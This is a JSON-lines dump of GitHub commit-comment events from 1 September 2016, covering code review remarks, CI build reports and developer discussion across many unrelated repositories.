{"id":"4501253193","type":"CommitCommentEvent","actor":{"login":"nightwolfdu"},"repo":{"name":"nightwolfdu/victory-chart"},"payload":{"comment":{"id":18860187,"position":12,"line":12,"path":"src/helpers/axissync.js","commit_id":"d43bb14fd8e2be06ef6fd8f3e5d47172c4f50588","created_at":"2016-09-01T08:45:58Z","updated_at":"2016-09-01T08:45:58Z","body":"flat(domains).map((elem)=> String(elem)).reduce((longestStr, str ) => return longestStr.length >= str ?  longestStr : str, '' );"}},"created_at":"2016-09-01T08:45:58Z"}
{"id":"4501253378","type":"CommitCommentEvent","actor":{"login":"raetiacorvus"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":18860188,"position":null,"line":null,"path":null,"commit_id":"5ecc356a41c8e29977f8608d8826489d24f5fa6c","created_at":"2016-09-01T08:46:00Z","updated_at":"2016-09-01T08:46:00Z","body":"Sadly this also will mean people will not optimized packages for their distributions.\r\nI bought and also contributed (as sirlbackheart) to asperite but still prefer to get the software trough my distributions package repository in contrast to steam or compiling it myself.\r\n\r\nI wonder what this new EULA means for Arch User Repository or similar things.\r\nIn that case no binary is distributed but only a script file that compiles and packages aseprite locally.\r\n\r\nWhile sad to see you have to take this stepp I understand that you tried to walk the line between having this project fully open source and to make a living out of working on your project.\r\n\r\nAs mentioned by @significant-bit it will be interesting to read what led to this decision."}},"created_at":"2016-09-01T08:46:00Z"}
{"id":"4501255593","type":"CommitCommentEvent","actor":{"login":"kkaefer"},"repo":{"name":"kkaefer/utf7"},"payload":{"comment":{"id":18860192,"position":23,"line":29,"path":"utf7.js","commit_id":"fc5bf2f9dc6e7d6977e2f775954e0035e87988d6","created_at":"2016-09-01T08:46:28Z","updated_at":"2016-09-01T08:46:28Z","body":"Released https://github.com/kkaefer/utf7/releases/tag/1.0.2"}},"created_at":"2016-09-01T08:46:28Z"}
{"id":"4501255995","type":"CommitCommentEvent","actor":{"login":"ZanderBrown"},"repo":{"name":"raspberrypi/pipanel"},"payload":{"comment":{"id":18860195,"position":5,"line":905,"path":"src/pipanel.c","commit_id":"0100b8982926b458849b71df4a9c2d067a0b6602","created_at":"2016-09-01T08:46:33Z","updated_at":"2016-09-01T08:46:33Z","body":"What does `/usr/share/pixel-wallpaper/road.jpg` look like?"}},"created_at":"2016-09-01T08:46:33Z"}
{"id":"4501257069","type":"CommitCommentEvent","actor":{"login":"Yuri226"},"repo":{"name":"shinya-nexseed/team_20160627"},"payload":{"comment":{"id":18860198,"position":null,"line":null,"path":null,"commit_id":"c9f945f44ab9d324968e3468ed97e2d2eab6bf36","created_at":"2016-09-01T08:46:46Z","updated_at":"2016-09-01T08:46:46Z","body":"マイページ機能変更しました"}},"created_at":"2016-09-01T08:46:46Z"}
{"id":"4501261720","type":"CommitCommentEvent","actor":{"login":"kusalananda"},"repo":{"name":"NBISweden/wgs-structvar"},"payload":{"comment":{"id":18860207,"position":31,"line":31,"path":"remove_temp_files.pl","commit_id":"68de6812a70d8661fcd937756104f7bdb8ce2088","created_at":"2016-09-01T08:47:45Z","updated_at":"2016-09-01T08:47:45Z","body":"`\\[ (.*?) \\]` to follow style used above."}},"created_at":"2016-09-01T08:47:45Z"}
{"id":"4501262460","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/optimizer-api"},"payload":{"comment":{"id":18860209,"position":31,"line":36,"path":"public/js/script.js","commit_id":"83834657e9bddfcce212df46ea5900914904fc1c","created_at":"2016-09-01T08:47:54Z","updated_at":"2016-09-01T08:47:54Z","body":"missing space"}},"created_at":"2016-09-01T08:47:54Z"}
{"id":"4501262539","type":"CommitCommentEvent","actor":{"login":"Anzely"},"repo":{"name":"javaprogramingforwomen/java"},"payload":{"comment":{"id":18860211,"position":null,"line":null,"path":null,"commit_id":"8dc6635cee1548699b87b0457e7b6324fa68282f","created_at":"2016-09-01T08:47:55Z","updated_at":"2016-09-01T08:47:55Z","body":"látod??"}},"created_at":"2016-09-01T08:47:55Z"}
{"id":"4501262890","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/optimizer-api"},"payload":{"comment":{"id":18860213,"position":28,"line":33,"path":"public/js/script.js","commit_id":"83834657e9bddfcce212df46ea5900914904fc1c","created_at":"2016-09-01T08:48:00Z","updated_at":"2016-09-01T08:48:00Z","body":"useful ?"}},"created_at":"2016-09-01T08:48:00Z"}
{"id":"4501263622","type":"CommitCommentEvent","actor":{"login":"euangoddard"},"repo":{"name":"2degrees/twapi-connection"},"payload":{"comment":{"id":18860216,"position":13,"line":185,"path":"twapi_connection/__init__.py","commit_id":"65e9020f05171ec12276160df820382fd087992e","created_at":"2016-09-01T08:48:09Z","updated_at":"2016-09-01T08:48:09Z","body":"Do you think there's any merit to having a class-level attribute to describe successful response codes?"}},"created_at":"2016-09-01T08:48:09Z"}
{"id":"4501264023","type":"CommitCommentEvent","actor":{"login":"cdeil"},"repo":{"name":"gammapy/gammapy"},"payload":{"comment":{"id":18860217,"position":null,"line":null,"path":null,"commit_id":"82eac793d4dd5fe52ab0f1ba9be9ad74b8d8af18","created_at":"2016-09-01T08:48:13Z","updated_at":"2016-09-01T08:48:13Z","body":"We have many cases in SkyImage and other classes where we use the class name to construct new objects in methods.\r\nPlease file a reminder issue to fix this systematically, not just in this one class / method.\r\n\r\nI guess you want this to return a sub-class SkyMask here?"}},"created_at":"2016-09-01T08:48:13Z"}
{"id":"4501264337","type":"CommitCommentEvent","actor":{"login":"akorb"},"repo":{"name":"SimpleRegex/SRL-CSharp"},"payload":{"comment":{"id":18860218,"position":null,"line":null,"path":null,"commit_id":"b00fb445a8d49ff50b0456c41c8f26deec4fc352","created_at":"2016-09-01T08:48:17Z","updated_at":"2016-09-01T08:48:17Z","body":"In PregException are some PHP specific exceptions. But for a start only implemented a structure and left the specific stuff"}},"created_at":"2016-09-01T08:48:17Z"}
{"id":"4501267314","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/optimizer-api"},"payload":{"comment":{"id":18860227,"position":51,"line":56,"path":"public/js/script.js","commit_id":"83834657e9bddfcce212df46ea5900914904fc1c","created_at":"2016-09-01T08:48:54Z","updated_at":"2016-09-01T08:48:54Z","body":"if role and uuid are in object, not necessary"}},"created_at":"2016-09-01T08:48:54Z"}
{"id":"4501267691","type":"CommitCommentEvent","actor":{"login":"nightwolfdu"},"repo":{"name":"nightwolfdu/victory-chart"},"payload":{"comment":{"id":18860230,"position":27,"line":27,"path":"src/helpers/axissync.js","commit_id":"d43bb14fd8e2be06ef6fd8f3e5d47172c4f50588","created_at":"2016-09-01T08:48:59Z","updated_at":"2016-09-01T08:48:59Z","body":"const getSize = (isVertical, obj) => isVertical ? obj.height : obj.width;"}},"created_at":"2016-09-01T08:48:59Z"}
{"id":"4501271186","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/optimizer-api"},"payload":{"comment":{"id":18860243,"position":99,"line":104,"path":"public/js/script.js","commit_id":"83834657e9bddfcce212df46ea5900914904fc1c","created_at":"2016-09-01T08:49:44Z","updated_at":"2016-09-01T08:49:44Z","body":"console.log needed ?"}},"created_at":"2016-09-01T08:49:44Z"}
{"id":"4501272375","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":18860248,"position":47,"line":1423,"path":"plugins/GSdx/GSRendererOGL.cpp","commit_id":"19a9d639b15b37bb0da7f3d3b865d57ac5a6bd72","created_at":"2016-09-01T08:50:00Z","updated_at":"2016-09-01T08:50:00Z","body":"I did it on purpose. It is potentially micro-faster (or maybe slower ;) ). I didn't check the generated code. `||` early exit. So it likely require more instruction."}},"created_at":"2016-09-01T08:50:00Z"}
{"id":"4501272994","type":"CommitCommentEvent","actor":{"login":"runsystem-hiennt2"},"repo":{"name":"quocthanh/quocthanh.github.io"},"payload":{"comment":{"id":18860251,"position":13,"line":35,"path":"PHP/basic/upload_return_file_get_contents/upload.php","commit_id":"c994db34da870b3d5dba40d8da2458cde38536c8","created_at":"2016-09-01T08:50:09Z","updated_at":"2016-09-01T08:50:09Z","body":"Em nên khai báo `$response` là `array` trước khi thêm giá trị cho nó."}},"created_at":"2016-09-01T08:50:09Z"}
{"id":"4501273064","type":"CommitCommentEvent","actor":{"login":"franciscoruiz"},"repo":{"name":"2degrees/twapi-users"},"payload":{"comment":{"id":18860254,"position":13,"line":161,"path":"twapi_users/testing.py","commit_id":"1114c3c9df098beafbf9d688ffe9700aabf1df2f","created_at":"2016-09-01T08:50:10Z","updated_at":"2016-09-01T08:50:10Z","body":"+1 and I'll make `__call__` an abstract method."}},"created_at":"2016-09-01T08:50:10Z"}
{"id":"4501274035","type":"CommitCommentEvent","actor":{"login":"kostyakudo"},"repo":{"name":"kostyakudo/Hillel-FE-Basic"},"payload":{"comment":{"id":18860256,"position":34,"line":27,"path":"index.html","commit_id":"fc7cddcea70fe091247996647aba1bf0b160f99b","created_at":"2016-09-01T08:50:21Z","updated_at":"2016-09-01T08:50:21Z","body":"ой) случайно..видимо в спешке\n\n2016-09-01 11:43 GMT+03:00 Denis Zaichenko <notifications@github.com>:\n\n> </div> закрой за тегом а то так не валидно\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/kostyakudo/Hillel-FE-Basic/commit/fc7cddcea70fe091247996647aba1bf0b160f99b#commitcomment-18860086>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AUWmbUgjWZA1gOjU7kumz6sBb0tiB7Vuks5qlpBBgaJpZM4Jyc3L>\n> .\n>\n"}},"created_at":"2016-09-01T08:50:21Z"}
{"id":"4501275140","type":"CommitCommentEvent","actor":{"login":"jonmcalder"},"repo":{"name":"jonmcalder/refactor"},"payload":{"comment":{"id":18860258,"position":6,"line":17,"path":"R/cut.integer.R","commit_id":"b8deb03bc52b5c4eb2b7367128b370b0d3c845a5","created_at":"2016-09-01T08:50:34Z","updated_at":"2016-09-01T08:50:34Z","body":"haha - whoops! thanks :-)"}},"created_at":"2016-09-01T08:50:34Z"}
{"id":"4501275321","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18860260,"position":null,"line":null,"path":null,"commit_id":"aba01852baadcde1e011be35a34bbfa328e1b3bc","created_at":"2016-09-01T08:50:37Z","updated_at":"2016-09-01T08:50:37Z","body":"I didn't do that, because then it would just bundle all the files in the res folder into one. By letting it only use the files in its own folder you can better decide, which files to bundle into one. Either way you're only going to execute it once, so it should be fine."}},"created_at":"2016-09-01T08:50:37Z"}
{"id":"4501276306","type":"CommitCommentEvent","actor":{"login":"rsennrich"},"repo":{"name":"rsennrich/nematus"},"payload":{"comment":{"id":18860262,"position":null,"line":null,"path":null,"commit_id":"e372a0b442de8769ef82575ede5612cf4780e979","created_at":"2016-09-01T08:50:49Z","updated_at":"2016-09-01T08:50:49Z","body":"Just as a heads-up to anyone following this discussion. It looks like the NaN issue was due to a numerically unstable softmax in the attention model, and this was fixed by Joost and Marcin in commit c71f113d6987017416b227959333d402739f753e."}},"created_at":"2016-09-01T08:50:49Z"}
{"id":"4501282006","type":"CommitCommentEvent","actor":{"login":"MrZaYaC"},"repo":{"name":"kostyakudo/Hillel-FE-Basic"},"payload":{"comment":{"id":18860286,"position":null,"line":null,"path":null,"commit_id":"fc7cddcea70fe091247996647aba1bf0b160f99b","created_at":"2016-09-01T08:52:04Z","updated_at":"2016-09-01T08:52:04Z","body":"Есть проблемы с форматированием. Код должен выглядеть красиво, везде отступы одинаковые.\r\nНапример:\r\n```css\r\nli:hover{transition: 5s;\r\n font-size: 25px;\r\n     margin: 30px;\r\n     color:darkgoldenrod;} \r\n```\r\nдолжно выглядеть так:\r\n```css\r\nli:hover {\r\n    transition: 5s;\r\n    font-size: 25px;\r\n    margin: 30px;\r\n    color:darkgoldenrod;\r\n}\r\n```"}},"created_at":"2016-09-01T08:52:04Z"}
{"id":"4501284247","type":"CommitCommentEvent","actor":{"login":"ToTranMinhNhut"},"repo":{"name":"ToTranMinhNhut/Advanced-Java"},"payload":{"comment":{"id":18860289,"position":null,"line":null,"path":null,"commit_id":"0beb1dd235b7360b150da9c8c7bcd7037f15ec5f","created_at":"2016-09-01T08:52:33Z","updated_at":"2016-09-01T08:52:33Z","body":"Task 19"}},"created_at":"2016-09-01T08:52:33Z"}
{"id":"4501287474","type":"CommitCommentEvent","actor":{"login":"rakuco"},"repo":{"name":"crosswalk-project/chromium-crosswalk"},"payload":{"comment":{"id":18860300,"position":null,"line":null,"path":null,"commit_id":"accdb96d922d789bf8204ff4ca1af87d09673c90","created_at":"2016-09-01T08:53:11Z","updated_at":"2016-09-01T08:53:11Z","body":"#383"}},"created_at":"2016-09-01T08:53:11Z"}
{"id":"4501290728","type":"CommitCommentEvent","actor":{"login":"kostyakudo"},"repo":{"name":"kostyakudo/Hillel-FE-Basic"},"payload":{"comment":{"id":18860312,"position":null,"line":null,"path":null,"commit_id":"fc7cddcea70fe091247996647aba1bf0b160f99b","created_at":"2016-09-01T08:53:51Z","updated_at":"2016-09-01T08:53:51Z","body":"Сейчас сделаю)\r\n\r\nчетверг, 1 сентября 2016 г. пользователь Denis Zaichenko написал:\r\n\r\n> Есть проблемы с форматированием. Код должен выглядеть красиво, везде\r\n> отступы одинаковые.\r\n> Например:\r\n>\r\n> li:hover{transition: 5s;\r\n>  font-size: 25px;\r\n>      margin: 30px;\r\n>      color:darkgoldenrod;}\r\n>\r\n> должно выглядеть так:\r\n>\r\n> li:hover {\r\n>     transition: 5s;\r\n>     font-size: 25px;\r\n>     margin: 30px;\r\n>     color:darkgoldenrod;\r\n> }\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/kostyakudo/Hillel-FE-Basic/commit/fc7cddcea70fe091247996647aba1bf0b160f99b#commitcomment-18860286>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AUWmbaLoObLOP2Pw4ltaLSJtX8ORVgANks5qlpI0gaJpZM4Jyc3L>\r\n> .\r\n>\r\n"}},"created_at":"2016-09-01T08:53:51Z"}
{"id":"4501291823","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18860313,"position":null,"line":null,"path":null,"commit_id":"ee02cc0befbab1dc6207e8dda177184f9d5750b3","created_at":"2016-09-01T08:54:07Z","updated_at":"2016-09-01T08:54:07Z","body":"113835831-Source-Temp-Not-Reporting (mjwitte) - i386-Windows-7-VisualStudio-12: OK (2332 of 2333 tests passed, 24 test warnings)\n\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee02cc0befbab1dc6207e8dda177184f9d5750b3-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee02cc0befbab1dc6207e8dda177184f9d5750b3-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-01T08:54:07Z"}
{"id":"4501292900","type":"CommitCommentEvent","actor":{"login":"Deesen"},"repo":{"name":"Jako/multiTV"},"payload":{"comment":{"id":18860318,"position":null,"line":null,"path":null,"commit_id":"9130a5fae1088ca337ccfeee45cf00f8da122a9f","created_at":"2016-09-01T08:54:20Z","updated_at":"2016-09-01T08:54:20Z","body":"Thanks :-)"}},"created_at":"2016-09-01T08:54:20Z"}
{"id":"4501293245","type":"CommitCommentEvent","actor":{"login":"springflute"},"repo":{"name":"springflute/dailywork"},"payload":{"comment":{"id":18860319,"position":null,"line":null,"path":null,"commit_id":"3cd8773c35f655a05a311fa1b4fe5990ca463777","created_at":"2016-09-01T08:54:24Z","updated_at":"2016-09-01T08:54:24Z","body":"精算rpn月初任务报表(2h)\r\ncognos报表8月份数据提取(3h)\r\n青岛分公司-车险估损偏差率清单sql脚本修改成存储过程提数(2h)"}},"created_at":"2016-09-01T08:54:24Z"}
{"id":"4501294628","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":18860325,"position":null,"line":null,"path":null,"commit_id":"c91560e87c7d843b3f2cdc7c8e1427ac0f724d90","created_at":"2016-09-01T08:54:42Z","updated_at":"2016-09-01T08:54:42Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#IbVrE1e7Te-_IPf9qV3otA"}},"created_at":"2016-09-01T08:54:42Z"}
{"id":"4501296519","type":"CommitCommentEvent","actor":{"login":"joleroi"},"repo":{"name":"gammapy/gammapy"},"payload":{"comment":{"id":18860332,"position":null,"line":null,"path":null,"commit_id":"82eac793d4dd5fe52ab0f1ba9be9ad74b8d8af18","created_at":"2016-09-01T08:55:05Z","updated_at":"2016-09-01T08:55:05Z","body":"https://github.com/gammapy/gammapy/issues/695"}},"created_at":"2016-09-01T08:55:05Z"}
{"id":"4501298391","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18860338,"position":7,"line":87,"path":"common/network-common/pom.xml","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-01T08:55:28Z","updated_at":"2016-09-01T08:55:28Z","body":"Use ``` <version>${commons-codec.version}</version> ```"}},"created_at":"2016-09-01T08:55:28Z"}
{"id":"4501300399","type":"CommitCommentEvent","actor":{"login":"linkdr"},"repo":{"name":"aofeng/threadpool4j"},"payload":{"comment":{"id":18860341,"position":73,"line":69,"path":"example/cn/aofeng/threadpool4j/ThreadPoolExample.java","commit_id":"5398a7cc95583a89715a581b70c30673e0828e27","created_at":"2016-09-01T08:55:51Z","updated_at":"2016-09-01T08:55:51Z","body":"//"}},"created_at":"2016-09-01T08:55:51Z"}
{"id":"4501301353","type":"CommitCommentEvent","actor":{"login":"linkdr"},"repo":{"name":"aofeng/threadpool4j"},"payload":{"comment":{"id":18860345,"position":73,"line":69,"path":"example/cn/aofeng/threadpool4j/ThreadPoolExample.java","commit_id":"5398a7cc95583a89715a581b70c30673e0828e27","created_at":"2016-09-01T08:56:03Z","updated_at":"2016-09-01T08:56:03Z","body":"AA"}},"created_at":"2016-09-01T08:56:03Z"}
{"id":"4501301542","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18860350,"position":17,"line":17,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/CipherOption.java","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-01T08:56:06Z","updated_at":"2016-09-01T08:56:06Z","body":"Remove this line"}},"created_at":"2016-09-01T08:56:06Z"}
{"id":"4501302431","type":"CommitCommentEvent","actor":{"login":"rehsals"},"repo":{"name":"Alamofire/AlamofireImage"},"payload":{"comment":{"id":18860351,"position":13,"line":27,"path":"AlamofireImage.podspec","commit_id":"a25ff6732707fc57127348aa2dbfc52b144018f3","created_at":"2016-09-01T08:56:17Z","updated_at":"2016-09-01T08:56:17Z","body":"Could you please update dependency to `beta.2` since `beta.1` had build problems?"}},"created_at":"2016-09-01T08:56:17Z"}
{"id":"4501304098","type":"CommitCommentEvent","actor":{"login":"rakuco"},"repo":{"name":"crosswalk-project/chromium-crosswalk"},"payload":{"comment":{"id":18860354,"position":null,"line":null,"path":null,"commit_id":"b9a214519bdd6df120cade0e5a92727a13765584","created_at":"2016-09-01T08:56:38Z","updated_at":"2016-09-01T08:56:38Z","body":"Neither this commit nor https://github.com/crosswalk-project/chromium-crosswalk/commit/0f07a04e9919d4e5efd48633cc766aa62ecc089a are needed now that gyp does not work on Android."}},"created_at":"2016-09-01T08:56:38Z"}
{"id":"4501305573","type":"CommitCommentEvent","actor":{"login":"siddontang"},"repo":{"name":"pingcap/tidb-tools"},"payload":{"comment":{"id":18860358,"position":22,"line":120,"path":"syncer/db.go","commit_id":"975ba6a06232ff7afef3e2ec5e7ab450d23c845d","created_at":"2016-09-01T08:56:57Z","updated_at":"2016-09-01T08:56:57Z","body":"still need to format plain type? "}},"created_at":"2016-09-01T08:56:57Z"}
{"id":"4501305773","type":"CommitCommentEvent","actor":{"login":"draknyte1"},"repo":{"name":"Blood-Asp/GT5-Unofficial"},"payload":{"comment":{"id":18860359,"position":null,"line":null,"path":null,"commit_id":"b4049e88a269b5def8d3335aec566dcfc387a26b","created_at":"2016-09-01T08:57:00Z","updated_at":"2016-09-01T08:57:00Z","body":"I7 4770k @ 4.5Ghz~ (Variable clock)\r\nRan about 20 runs on each build, With and without the TC changes, my results weren't promising.\r\nhttp://pastebin.com/xiiAeSyu\r\n\r\nThe builds used were from a fresh clone of master here, specifically for testing this loading time difference against my 201 mod modpack."}},"created_at":"2016-09-01T08:57:00Z"}
{"id":"4501305863","type":"CommitCommentEvent","actor":{"login":"rakuco"},"repo":{"name":"crosswalk-project/chromium-crosswalk"},"payload":{"comment":{"id":18860360,"position":null,"line":null,"path":null,"commit_id":"c3d415411fba3786ce4344e5493de7118c5451d2","created_at":"2016-09-01T08:57:01Z","updated_at":"2016-09-01T08:57:01Z","body":"This is no longer needed now that we don't care about gyp on Android."}},"created_at":"2016-09-01T08:57:01Z"}
{"id":"4501306675","type":"CommitCommentEvent","actor":{"login":"bcopy"},"repo":{"name":"CMCRobotics/inmoov-cmc"},"payload":{"comment":{"id":18860363,"position":null,"line":null,"path":null,"commit_id":"9aec6573472c4187f51267913923516a0e271a72","created_at":"2016-09-01T08:57:13Z","updated_at":"2016-09-01T08:57:13Z","body":"Hi, there's one thing, I haven't had a chance to perform any kind of tests on the actual servos... does the code work ??"}},"created_at":"2016-09-01T08:57:13Z"}
{"id":"4501306750","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/optimizer-api"},"payload":{"comment":{"id":18860364,"position":158,"line":676,"path":"public/js/script.js","commit_id":"83834657e9bddfcce212df46ea5900914904fc1c","created_at":"2016-09-01T08:57:14Z","updated_at":"2016-09-01T08:57:14Z","body":"needed ?"}},"created_at":"2016-09-01T08:57:14Z"}
{"id":"4501309743","type":"CommitCommentEvent","actor":{"login":"paced"},"repo":{"name":"paced/Colourscheme-Generator"},"payload":{"comment":{"id":18860367,"position":null,"line":null,"path":null,"commit_id":"afdb3d6741db7c4ca69faef2de3bb9abd2f51d28","created_at":"2016-09-01T08:57:51Z","updated_at":"2016-09-01T08:57:51Z","body":"If a future employer is reading this, please don't fire me. I was 18."}},"created_at":"2016-09-01T08:57:51Z"}
{"id":"4501310151","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18860368,"position":38,"line":38,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/CipherOption.java","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-01T08:57:56Z","updated_at":"2016-09-01T08:57:56Z","body":"Why keep this constructor? If you remove it, no need to set inKey, outKey, inIv and outIv to null."}},"created_at":"2016-09-01T08:57:56Z"}
{"id":"4501310357","type":"CommitCommentEvent","actor":{"login":"Deesen"},"repo":{"name":"Jako/multiTV"},"payload":{"comment":{"id":18860369,"position":null,"line":null,"path":null,"commit_id":"ddfe6fb89db94b50006e7b52338e1b8f5402476f","created_at":"2016-09-01T08:57:58Z","updated_at":"2016-09-01T08:57:58Z","body":"The \"duplicate\"-button is missing on Transifex:\r\n\r\n    $language['duplicate'] = 'Duplicate';"}},"created_at":"2016-09-01T08:57:58Z"}
{"id":"4501310539","type":"CommitCommentEvent","actor":{"login":"siddontang"},"repo":{"name":"pingcap/tidb-tools"},"payload":{"comment":{"id":18860370,"position":72,"line":351,"path":"syncer/db.go","commit_id":"975ba6a06232ff7afef3e2ec5e7ab450d23c845d","created_at":"2016-09-01T08:58:00Z","updated_at":"2016-09-01T08:58:00Z","body":"maybe return [][]interface{} ?"}},"created_at":"2016-09-01T08:58:00Z"}
{"id":"4501310746","type":"CommitCommentEvent","actor":{"login":"DaniilZhavner"},"repo":{"name":"PurrWeb/upwork-user-agreement"},"payload":{"comment":{"id":18860372,"position":null,"line":null,"path":null,"commit_id":"d9abd74953d6a4b168a2e3a2201fbc2d37739bc8","created_at":"2016-09-01T08:58:04Z","updated_at":"2016-09-01T08:58:04Z","body":"done"}},"created_at":"2016-09-01T08:58:04Z"}
{"id":"4501311390","type":"CommitCommentEvent","actor":{"login":"judoteamcity"},"repo":{"name":"JudoPay/Judo-Android"},"payload":{"comment":{"id":18860374,"position":null,"line":null,"path":null,"commit_id":"a53e670cd90c3caf6d0855cbeda3dabd8ecd5f93","created_at":"2016-09-01T08:58:11Z","updated_at":"2016-09-01T08:58:11Z","body":"TeamCity Mobile :: Android :: Android SDK (develop) [Build 685](http://teamcity/viewLog.html?buildId=55438&buildTypeId=JudoAndroid_AndroidGradle) is now running\n"}},"created_at":"2016-09-01T08:58:11Z"}
{"id":"4501312048","type":"CommitCommentEvent","actor":{"login":"vladimirtemnikov"},"repo":{"name":"vladimirbazhanov/flatstack-game"},"payload":{"comment":{"id":18860377,"position":13,"line":11,"path":"app/models/game.rb","commit_id":"a50439b509edd6061b1248cdc6acc61ed38d9caa","created_at":"2016-09-01T08:58:19Z","updated_at":"2016-09-01T08:58:19Z","body":"cool stuff: https://github.com/brainspec/enumerize"}},"created_at":"2016-09-01T08:58:19Z"}
{"id":"4501312686","type":"CommitCommentEvent","actor":{"login":"bcopy"},"repo":{"name":"CMCRobotics/inmoov-cmc"},"payload":{"comment":{"id":18860381,"position":null,"line":null,"path":null,"commit_id":"9aec6573472c4187f51267913923516a0e271a72","created_at":"2016-09-01T08:58:26Z","updated_at":"2016-09-01T08:58:26Z","body":"Also, I was thinking of a global unique identifier for each servo (so right fingers should start from 6 or something)"}},"created_at":"2016-09-01T08:58:26Z"}
{"id":"4501314315","type":"CommitCommentEvent","actor":{"login":"kusalananda"},"repo":{"name":"NBISweden/wgs-structvar"},"payload":{"comment":{"id":18860386,"position":50,"line":50,"path":"remove_temp_files.pl","commit_id":"68de6812a70d8661fcd937756104f7bdb8ce2088","created_at":"2016-09-01T08:58:46Z","updated_at":"2016-09-01T08:58:46Z","body":"`catdir` here."}},"created_at":"2016-09-01T08:58:46Z"}
{"id":"4501315946","type":"CommitCommentEvent","actor":{"login":"kusalananda"},"repo":{"name":"NBISweden/wgs-structvar"},"payload":{"comment":{"id":18860392,"position":51,"line":51,"path":"remove_temp_files.pl","commit_id":"68de6812a70d8661fcd937756104f7bdb8ce2088","created_at":"2016-09-01T08:59:07Z","updated_at":"2016-09-01T08:59:07Z","body":"`$dir/*`"}},"created_at":"2016-09-01T08:59:07Z"}
{"id":"4501316995","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18860396,"position":null,"line":null,"path":null,"commit_id":"3635568d58810bcd9ed0f4b6ad896be652f4c71b","created_at":"2016-09-01T08:59:19Z","updated_at":"2016-09-01T08:59:19Z","body":"Mh, did the pokesite.py give you an error message before you relaunched it?"}},"created_at":"2016-09-01T08:59:19Z"}
{"id":"4501317768","type":"CommitCommentEvent","actor":{"login":"jamesmunns"},"repo":{"name":"jamesmunns/rust-linking"},"payload":{"comment":{"id":18860398,"position":14,"line":100,"path":"README.md","commit_id":"92d649a235632d3845c897922ce5e3e2b8062882","created_at":"2016-09-01T08:59:27Z","updated_at":"2016-09-01T08:59:27Z","body":"@vincentjames501 If you enable compile time optimizations, it goes way faster :D"}},"created_at":"2016-09-01T08:59:27Z"}
{"id":"4501320914","type":"CommitCommentEvent","actor":{"login":"MrZaYaC"},"repo":{"name":"vatsona/Hillel-FE-Basic"},"payload":{"comment":{"id":18860407,"position":null,"line":null,"path":null,"commit_id":"86c2321ee32fe646f092ef873a5fdc024069663c","created_at":"2016-09-01T09:00:06Z","updated_at":"2016-09-01T09:00:06Z","body":"Обрати внимание на форматирование кода, лишние строки, пробелы или наоборот отсутсвие пробелов. Все должно быть красиво и одинаково"}},"created_at":"2016-09-01T09:00:06Z"}
{"id":"4501322996","type":"CommitCommentEvent","actor":{"login":"wjwithagen"},"repo":{"name":"ceph/ceph"},"payload":{"comment":{"id":18860413,"position":12,"line":8,"path":"src/pybind/CMakeLists.txt","commit_id":"5683a8259ba6a2e434f8b600d1b5518824a1a394","created_at":"2016-09-01T09:00:30Z","updated_at":"2016-09-01T09:00:30Z","body":"@BlaXpirit \r\nWhy would you set PYTHON_VERSION to \"\" here?\r\nThis way it will always think it finds cython3 even if it is not available.\r\nWhatever cython3 actually means, because I'm getting 0.24 as cython version.\r\nWhich is at least very confusing....\r\n"}},"created_at":"2016-09-01T09:00:30Z"}
{"id":"4501324975","type":"CommitCommentEvent","actor":{"login":"amitvarma77"},"repo":{"name":"jmassara/packer-rhel7-vms"},"payload":{"comment":{"id":18860424,"position":null,"line":null,"path":null,"commit_id":"40bde365e0e5dbe53876ee71080cc01a391bd800","created_at":"2016-09-01T09:00:53Z","updated_at":"2016-09-01T09:00:53Z","body":"I used your scripts but I find that vmwaretool is not getting installed. Can you please help"}},"created_at":"2016-09-01T09:00:53Z"}
